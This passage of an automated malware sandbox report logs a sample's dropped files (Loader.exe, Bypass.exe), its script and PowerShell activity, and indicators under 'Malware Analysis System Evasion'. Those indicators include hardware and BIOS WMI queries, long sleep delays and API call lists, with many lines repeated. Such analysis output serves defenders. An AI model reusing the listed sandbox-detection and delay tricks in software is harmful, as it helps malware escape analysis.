                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeMemory allocated: 10D0000 memory reserve | memory write watch
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeMemory allocated: 1ABF0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 600000
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599875
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599766
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599749
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599641
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599532
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599407
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599296
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599187
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599078
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598969
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598857
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598745
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598607
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598500
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598391
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598281
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598172
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598063
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597938
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597813
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597688
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597578
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597469
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597344
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597223
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597032
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 596157
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595969
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595719
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595422
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595282
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595090
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594946
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594672
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594391
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594188
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 593703
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 593485
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592969
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592750
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592453
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592250
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592032
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591657
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591358
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591063
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590907
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590516
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590157
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589953
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589688
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589469
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589000
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588719
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588266
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588078
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587782
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587607
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587497
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587375
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587266
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587155
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4354Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5482Jump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWindow / User API: threadDelayed 4561
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWindow / User API: threadDelayed 5051
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep count: 4354 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep count: 5482 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6944Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -600000s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599875s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599766s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599749s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599641s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599532s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599407s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599296s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599187s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -599078s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598969s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598857s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598745s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598607s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598500s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598391s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598281s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598172s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -598063s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597938s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597813s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597688s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597578s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597469s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597344s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597223s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -597032s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -596157s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -595969s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -595719s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -595422s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -595282s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -595090s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -594946s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -594672s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -594391s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -594188s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -593703s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -593485s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -592969s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -592750s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -592453s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -592250s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -592032s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -591657s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -591358s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -591063s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -590907s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -590516s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -590157s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -589953s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -589688s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -589469s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -589000s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -588719s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -588266s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -588078s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587782s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587607s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587497s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587375s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587266s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160Thread sleep time: -587155s >= -30000s
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF71613B190
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7161240BC
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71614FCA0 FindFirstFileExA,0_2_00007FF71614FCA0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF64D3340BC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D34B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF64D34B190
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D35FCA0 FindFirstFileExA,11_2_00007FF64D35FCA0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009DF406 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_009DF406
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161416A4 VirtualQuery,GetSystemInfo,0_2_00007FF7161416A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 600000
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599875
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599766
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599749
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599641
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599532
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599407
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599296
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599187
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 599078
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598969
